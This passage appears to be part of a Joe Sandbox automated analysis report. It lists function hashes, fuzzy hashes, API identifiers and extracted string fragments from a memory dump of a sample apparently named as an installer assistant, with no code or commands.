                              • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction Fuzzy Hash: EA21BAB0900704AFD730CFA98991B6BBAFDEB44754F10891EA185D7B40D77099888B65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              • API String ID: 3519838083-205571748
                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction ID: bf4d914893da3c0ea9b1baa91e1338c70536f2023654d2cc8766398fdaf38991
                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction Fuzzy Hash: A001C0B2E01349DADB10DFE984905AEF7B4FF59358F40942EE069E3A40C3345988CB99
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$xMJ
                              • API String ID: 3519838083-951924499
                              • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction ID: beb6a4a18987e0473419c302adc466ff4c7761483194c54261b92720ed9c0aad
                              • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction Fuzzy Hash: 28117C71E00209DBCB00DF99D49059EB7B4FF1838CB50C82ED469E7B01D3389A85CBA6
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: p/K$J
                              • API String ID: 3519838083-2069324279
                              • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction ID: 33b992c7c35be0c49cfb7ce0c3b2743424f940fcbae780938efb47348e915b54
                              • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction Fuzzy Hash: CF01BCB2A117119FD724CF59D6043AAB7F8EF55729F10C81E9052A3B80C7F8A5488BA4
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA3AFCC
                                • Part of subcall function 6CA3A4D1: __EH_prolog.LIBCMT ref: 6CA3A4D6
                                • Part of subcall function 6CA3914B: __EH_prolog.LIBCMT ref: 6CA39150
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J
                              • API String ID: 3519838083-2882003284
                              • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction ID: 5b5d1b820dd7b3df870d12daf9118b5c6d207c29864f2d4d586f4133726c65e1
                              • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction Fuzzy Hash: 800105B1804B51CFC325CF65C5A428AFBF0BB15304F90C95EC0AA57B50D7B8A548CB68
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA343F9
                                • Part of subcall function 6CA34320: __EH_prolog.LIBCMT ref: 6CA34325
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: `)L$|{J
                              • API String ID: 3519838083-2198066115
                              • Opcode ID: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                              • Instruction ID: 062def226215821bef9b9916c6158bd6b2d6e2d2af9992cf683b6e75104fedd8
                              • Opcode Fuzzy Hash: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                              • Instruction Fuzzy Hash: 42F08C72610114FFCB059F94DD05BDEBFB9FF49314F00802AF516A6650CBB66A58CB98
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prologctype
                              • String ID: <oJ
                              • API String ID: 3037903784-2791053824
                              • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction ID: 793d666d96b5b8ce046547ead332752dcbbee8bc23728cf059cd3d5b2bafe0f2
                              • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction Fuzzy Hash: ACE0ED32A155209BDB049F08C820BDEF7A5EF50724F16001EE021A3B42CBB5AC448B80
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              • API String ID: 0-2262112463
                              • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction ID: 970a4e69f41a8e543ca08959340e2992bed86e34f75034b1f4bf9f4c362dd0a7
                              • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction Fuzzy Hash: DA51D331904249AFCF01CF98D840BDEB7B1AF2531CF64841AE82267A91DB76D9BDCB50
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2246896845.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246937970.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: (?K$8?K$H?K$CK
                              • API String ID: 0-3450752836
                              • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction ID: 6f92d36400599ade425d20aae9da8c755e8ef32715455fd66aa525b1a6909149
                              • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction Fuzzy Hash: F9F01DB16117009FC3608F05D54869BB7F4EB41749F50C91EE09A9BA40D3B8A54C8FA8